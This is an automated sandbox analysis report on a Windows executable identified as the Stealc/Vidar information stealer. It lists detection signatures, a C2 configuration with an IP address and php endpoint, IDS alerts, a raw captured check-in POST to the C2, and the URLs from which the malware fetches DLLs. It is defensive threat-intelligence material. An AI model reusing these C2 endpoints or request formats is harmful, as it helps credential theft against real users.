Edit tour

Windows Analysis Report
fXg8zgxVTF.exe

Overview

General Information

Sample name:	fXg8zgxVTF.exe renamed because original name is a hash value
Original sample name:	c7ca98803a76b62a6a379a0b684b162a.exe
Analysis ID:	1541134
MD5:	c7ca98803a76b62a6a379a0b684b162a
SHA1:	00de8f4666fe890f9fd3bf2d405cae32f3c2cc78
SHA256:	7fff867271d6f0f7c301e83dad5875e2194dbf2389ac33130b7711db7e6904bd
Tags:	32exe
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

fXg8zgxVTF.exe (PID: 3796 cmdline: "C:\Users\user\Desktop\fXg8zgxVTF.exe" MD5: C7CA98803A76B62A6A379A0B684B162A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "95.182.96.50/2aced82320799c96.php", "Botnet": "mainteam"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fXg8zgxVTF.exe PID: 3796	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: fXg8zgxVTF.exe PID: 3796	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: fXg8zgxVTF.exe PID: 3796	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fXg8zgxVTF.exe PID: 3796	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:13.157743+0200	2044245	1	Malware Command and Control Activity Detected	95.182.96.50	80	192.168.2.6	49714	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:13.150722+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	49714	95.182.96.50	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:13.385038+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	49714	95.182.96.50	80	TCP

ET MALWARE Win32/Stealc Submitting Screenshot to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:26.562929+0200	2044249	1	Malware Command and Control Activity Detected	192.168.2.6	49714	95.182.96.50	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:13.958040+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	49714	95.182.96.50	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:13.392439+0200	2044247	1	Malware Command and Control Activity Detected	95.182.96.50	80	192.168.2.6	49714	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:12.911652+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49714	95.182.96.50	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:54:14.430314+0200	2803304	3	Unknown Traffic	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:19.265599+0200	2803304	3	Unknown Traffic	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:20.730280+0200	2803304	3	Unknown Traffic	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:21.595119+0200	2803304	3	Unknown Traffic	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:22.218708+0200	2803304	3	Unknown Traffic	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:24.063009+0200	2803304	3	Unknown Traffic	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:24.577810+0200	2803304	3	Unknown Traffic	192.168.2.6	49714	95.182.96.50	80	TCP

HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 35 41 30 41 43 32 38 37 30 35 32 34 35 38 35 30 34 38 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="hwid"0C5A0AC287052458504893------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="build"mainteam------GCBKFIEBGCAAFIEBFCAE--

Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/)
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002FB8000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.php
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpData
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpEJpm
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpance
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpbj
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpe5
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpf
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpft
Source: fXg8zgxVTF.exe, 00000000.00000002.2395860797.00000000353D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpi
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpsition:
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpzj
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/freebl3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/freebl3.dll.
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/mozglue.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/mozglue.dll.
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll4
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dllW
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dllm
Source: fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dllt
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/softokn3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/softokn3.dllD
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/softokn3.dllr
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002FB8000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/sqlite3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll:SJ
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.500
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.502aced82320799c96.phpsition:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: fXg8zgxVTF.exe	String found in binary or memory: http://seriousbit.com/
Source: fXg8zgxVTF.exe	String found in binary or memory: http://seriousbit.com/openShell_TrayWndhttp://www.seriousbit.com/exploreropenInvalid
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: fXg8zgxVTF.exe, fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: fXg8zgxVTF.exe	String found in binary or memory: http://www.seriousbit.com/
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396113790.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JKFCBAEHCAEGDHJKFHJK.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://support.mozilla.org
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://www.mozilla.org
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

